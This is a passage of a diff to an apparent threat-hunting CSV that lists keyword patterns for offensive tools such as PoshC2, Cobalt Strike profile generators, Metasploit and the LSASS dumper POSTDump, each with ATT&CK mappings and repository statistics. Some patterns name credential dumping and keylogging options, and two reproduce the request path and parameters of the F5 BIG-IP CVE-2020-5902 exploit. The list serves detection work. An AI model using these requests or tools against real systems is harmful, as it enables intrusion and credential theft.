-*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-server -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-server -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 
framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-update *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*POST */tmui/login.jsp/.. 
/tmui/locallb/workspace/fileSave.jsp*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" -"*post/windows/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*post_breach_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*post_ex_amsi_disable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" 
-"*post_ex_keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*post_ex_obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post/windows/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*post_breach_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*post_ex_amsi_disable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" 
+"*post_ex_keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Post_EX_Process_Name*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*post_ex_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*post_ex_spawnto_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 
- LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*post_ex_spawnto_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_spawnto_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_spawnto_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile 
generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*POST_EXPLOIT_DIR*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*post_exploitation.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*post_exploitation.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*PostDump.exe *","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" "*POSTDump-main*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*postgres_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*postgres_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*postgres_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*postgres_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
